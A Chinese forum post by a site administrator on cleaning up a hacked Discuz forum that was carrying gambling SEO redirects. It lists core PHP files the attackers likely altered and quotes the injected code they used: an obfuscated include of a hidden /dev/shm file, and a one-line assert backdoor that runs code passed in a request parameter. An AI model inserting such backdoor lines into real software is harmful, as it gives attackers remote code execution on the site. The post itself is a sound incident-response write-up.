discuz论坛被入侵后最可能被修改的几个文件及处理办法

0
回复
38
查看
[复制链接]

891

帖子

23

精华

2908

金币

本站管理员

XM币
7857

灌水之王本站元老大师哥一枚金牛座至尊勋章蘑菇头

发表于 2020-9-20 01:04:38 | 显示全部楼层 |阅读模式
   最近发现站点被黑了,现在还不知道是由系统漏洞导致的系统账户被攻陷,还是程序漏洞,文件被篡改。有一些敏感关键词(例如:赌博,电子路单)被恶意指向,点击搜索结果自动跳转到其他站点,而且是大量的,通过搜索“site:xxx.com 赌博”,会发现一大堆。该目的是为该站点导流量,还有传递权重。

为了防止暴露,入侵者会把被篡改的文件时间戳保持不变,所以通过修改时间是发现不到可疑文件的

现在解决办法只限于,查找程序源码,一个一个文件对比最初的文件,最后发现有两个文件最重要,如下:

source/function/function_core.php
uc_server/control/admin/user.php
source/class/discuz/discuz_admincp.php
source/class/discuz/discuz_application.php
因为这四个文件,function_core.php是是核心函数库所有页面都会包含;user.php是ucenter后台登陆,discuz_admincp.php是discuz管理中心用户登录,都可以获得管理员账号和密码;discuz_application.php是整个discuz初始化的核心类文件,初始化加载。

遇到相同问题的朋友,请首先查看这几个文件是否被修改。



入侵方式一:一般会在全局文件中include一个外部的文件,例如:

@include('/dev/shm/.../tmp');

@include(PACK('H*','2f746d702f2e612f636c69656e742e706870'));



入侵方式二:

植入代码,可以执行外部传入的代码,例如:@array_map("ass\x65rt",(array)@$_REQUEST['ADMINCPS']);

ass\x65rt 其实就是 “assert”。



根据上面的线索,在下面的地方应该可以发现一些有恶意代码的文件,一般是恶意搜索引擎

系统的虚拟内存是否有东西,ls -a /dev/shm/ 例如:三个点的... 的隐藏文件
ls -a /tmp  这个也要注意


小孟资源分享是一个给网络新手提供各类源码以及技术经验分享学习的网站,免费分享各类网站模板,游戏源码,手游源码,H5手游,页游端游源码,游戏架设技术分享,网站架设技术分享,日常软件分享,游戏攻略,日常攻略分享都尽在(WWW.XMZYFX.COM)小孟资源分享学习网!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

专注源码模拟素材教程免费分享
www.xmzyfx.com

小孟资源分享网

每天不定时更新不同的资源和资讯

反馈建议

14508690@qq.com 在线QQ咨询

一个免费的资源分享网

© 2019-2020 XMZYFX.COM Inc.All Rights Reserved. 小孟资源分享网 ( 闽ICP备20012007号 )|网站地图|友链申请